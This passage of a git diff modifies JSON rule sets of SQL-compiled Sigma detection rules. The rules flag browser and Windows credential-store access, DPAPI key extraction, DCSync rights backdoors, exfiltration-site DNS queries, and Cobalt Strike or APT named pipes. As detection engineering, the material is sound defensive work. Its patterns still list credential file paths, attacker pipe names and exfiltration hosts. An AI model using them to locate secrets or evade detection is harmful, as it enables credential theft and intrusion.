- "attack.credential_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" + "Intended inclusions by administrator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\') OR (FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR (Image = 'System' AND ParentImage = 'Idle')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_access_win_browser_credential_stealing.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Suspicious Access To Windows Credential History File", - "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Azure AD Health Service Agents Registry Keys Access", + "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "status": "test", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_access_win_susp_cred_hist_access.yml" + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" }, { - "title": "Credential Manager Access", - "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" ], - "filename": "file_access_win_credential_manager_stealing.yml" + "filename": "win_security_account_backdoor_dcsync_rights.yml" }, { - "title": "Suspicious Access To Windows DPAPI Master Keys", - "id": "46612ae6-86be-4802-bc07-39b59feb1309", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_access_win_dpapi_master_key_access.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_sysmon_high.json b/rules/rules_windows_sysmon_high.json index d099ae7..66d3986 100644 --- a/rules/rules_windows_sysmon_high.json +++ b/rules/rules_windows_sysmon_high.json @@ -1,2636 +1,2602 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "status": "experimental", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Rare legitimate use of psexec from the locations mentioned above" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + }, + { + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": 